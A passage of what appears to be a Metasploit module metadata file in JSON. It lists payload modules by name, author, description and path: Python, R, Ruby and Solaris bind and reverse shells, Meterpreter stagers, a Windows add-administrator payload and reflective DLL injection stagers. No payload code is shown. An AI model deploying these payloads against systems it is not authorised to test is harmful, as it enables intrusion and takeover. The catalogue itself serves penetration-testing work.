"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Listen for a connection",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/bind_tcp.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/bind_tcp_uuid": {
"name": "Python Meterpreter, Python Bind TCP Stager with UUID Support",
"full_name": "payload/python/meterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"OJ Reeves"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Listen for a connection with UUID Support",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/reverse_http": {
"name": "Python Meterpreter, Python Reverse HTTP Stager",
"full_name": "payload/python/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Tunnel communication over HTTP",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/reverse_http.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/reverse_https": {
"name": "Python Meterpreter, Python Reverse HTTPS Stager",
"full_name": "payload/python/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Tunnel communication over HTTP using SSL",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/reverse_https.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/reverse_tcp": {
"name": "Python Meterpreter, Python Reverse TCP Stager",
"full_name": "payload/python/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Connect back to the attacker",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/reverse_tcp_ssl": {
"name": "Python Meterpreter, Python Reverse TCP SSL Stager",
"full_name": "payload/python/meterpreter/reverse_tcp_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"RageLtMan"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Reverse Python connect back stager using SSL",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/reverse_tcp_ssl.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/reverse_tcp_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/reverse_tcp_uuid": {
"name": "Python Meterpreter, Python Reverse TCP Stager with UUID Support",
"full_name": "payload/python/meterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"OJ Reeves"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter_bind_tcp": {
"name": "Python Meterpreter Shell, Bind TCP Inline",
"full_name": "payload/python/meterpreter_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Connect to the victim and spawn a Meterpreter shell",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-11 15:41:04 +0000",
"path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb",
"is_install_path": true,
"ref_name": "python/meterpreter_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter_reverse_http": {
"name": "Python Meterpreter Shell, Reverse HTTP Inline",
"full_name": "payload/python/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Connect back to the attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-11 15:41:04 +0000",
"path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "python/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter_reverse_https": {
"name": "Python Meterpreter Shell, Reverse HTTPS Inline",
"full_name": "payload/python/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Connect back to the attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-11 15:41:04 +0000",
"path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "python/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter_reverse_tcp": {
"name": "Python Meterpreter Shell, Reverse TCP Inline",
"full_name": "payload/python/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Connect back to the attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-11 15:41:04 +0000",
"path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "python/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/shell_bind_tcp": {
"name": "Command Shell, Bind TCP (via python)",
"full_name": "payload/python/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mumbai"
],
"description": "Creates an interactive shell via python, encodes with base64 by design",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-10-23 23:04:02 +0000",
"path": "/modules/payloads/singles/python/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "python/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/shell_reverse_tcp": {
"name": "Command Shell, Reverse TCP (via python)",
"full_name": "payload/python/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/python/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "python/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/shell_reverse_tcp_ssl": {
"name": "Command Shell, Reverse TCP SSL (via python)",
"full_name": "payload/python/shell_reverse_tcp_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb",
"is_install_path": true,
"ref_name": "python/shell_reverse_tcp_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/shell_reverse_udp": {
"name": "Command Shell, Reverse UDP (via python)",
"full_name": "payload/python/shell_reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 13:33:36 +0000",
"path": "/modules/payloads/singles/python/shell_reverse_udp.rb",
"is_install_path": true,
"ref_name": "python/shell_reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_r/shell_bind_tcp": {
"name": "R Command Shell, Bind TCP",
"full_name": "payload/r/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Continually listen for a connection and spawn a command shell via R",
"references": [
],
"platform": "R",
"arch": "r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-28 05:30:30 +0000",
"path": "/modules/payloads/singles/r/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "r/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_r/shell_reverse_tcp": {
"name": "R Command Shell, Reverse TCP",
"full_name": "payload/r/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Connect back and create a command shell via R",
"references": [
],
"platform": "R",
"arch": "r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-28 05:30:30 +0000",
"path": "/modules/payloads/singles/r/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "r/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_ruby/shell_bind_tcp": {
"name": "Ruby Command Shell, Bind TCP",
"full_name": "payload/ruby/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Continually listen for a connection and spawn a command shell via Ruby",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/ruby/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "ruby/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_ruby/shell_bind_tcp_ipv6": {
"name": "Ruby Command Shell, Bind TCP IPv6",
"full_name": "payload/ruby/shell_bind_tcp_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Continually listen for a connection and spawn a command shell via Ruby",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb",
"is_install_path": true,
"ref_name": "ruby/shell_bind_tcp_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_ruby/shell_reverse_tcp": {
"name": "Ruby Command Shell, Reverse TCP",
"full_name": "payload/ruby/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Connect back and create a command shell via Ruby",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/ruby/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "ruby/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_ruby/shell_reverse_tcp_ssl": {
"name": "Ruby Command Shell, Reverse TCP SSL",
"full_name": "payload/ruby/shell_reverse_tcp_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Connect back and create a command shell via Ruby, uses SSL",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb",
"is_install_path": true,
"ref_name": "ruby/shell_reverse_tcp_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/sparc/shell_bind_tcp": {
"name": "Solaris Command Shell, Bind TCP Inline",
"full_name": "payload/solaris/sparc/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Solaris",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "solaris/sparc/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/sparc/shell_find_port": {
"name": "Solaris Command Shell, Find Port Inline",
"full_name": "payload/solaris/sparc/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Solaris",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/solaris/sparc/shell_find_port.rb",
"is_install_path": true,
"ref_name": "solaris/sparc/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/sparc/shell_reverse_tcp": {
"name": "Solaris Command Shell, Reverse TCP Inline",
"full_name": "payload/solaris/sparc/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Solaris",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "solaris/sparc/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/x86/shell_bind_tcp": {
"name": "Solaris Command Shell, Bind TCP Inline",
"full_name": "payload/solaris/x86/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Solaris",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "solaris/x86/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/x86/shell_find_port": {
"name": "Solaris Command Shell, Find Port Inline",
"full_name": "payload/solaris/x86/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Solaris",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/solaris/x86/shell_find_port.rb",
"is_install_path": true,
"ref_name": "solaris/x86/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/x86/shell_reverse_tcp": {
"name": "Solaris Command Shell, Reverse TCP Inline",
"full_name": "payload/solaris/x86/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Solaris",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "solaris/x86/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_tty/unix/interact": {
"name": "Unix TTY, Interact with Established Connection",
"full_name": "payload/tty/unix/interact",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Interacts with a TTY on an established socket connection",
"references": [
],
"platform": "Unix",
"arch": "tty",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/tty/unix/interact.rb",
"is_install_path": true,
"ref_name": "tty/unix/interact",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/adduser": {
"name": "Windows Execute net user /ADD",
"full_name": "payload/windows/adduser",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>",
"Chris John Riley",
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/adduser.rb",
"is_install_path": true,
"ref_name": "windows/adduser",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/dllinject/bind_hidden_ipknock_tcp": {
"name": "Reflective DLL Injection, Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/dllinject/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_hidden_tcp": {
"name": "Reflective DLL Injection, Hidden Bind TCP Stager",
"full_name": "payload/windows/dllinject/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_ipv6_tcp": {
"name": "Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/dllinject/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_ipv6_tcp_uuid": {
"name": "Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/dllinject/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"OJ Reeves"
],
"description": "Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_named_pipe": {
"name": "Reflective DLL Injection, Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/dllinject/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_nonx_tcp": {
"name": "Reflective DLL Injection, Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/dllinject/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_tcp": {
"name": "Reflective DLL Injection, Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/dllinject/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_tcp_rc4": {
"name": "Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/dllinject/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/dllinject/bind_tcp_uuid": {
"name": "Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/dllinject/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/find_tag": {
"name": "Reflective DLL Injection, Find Tag Ordinal Stager",
"full_name": "payload/windows/dllinject/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Use an established connection",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_hop_http": {
"name": "Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager",
"full_name": "payload/windows/dllinject/reverse_hop_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
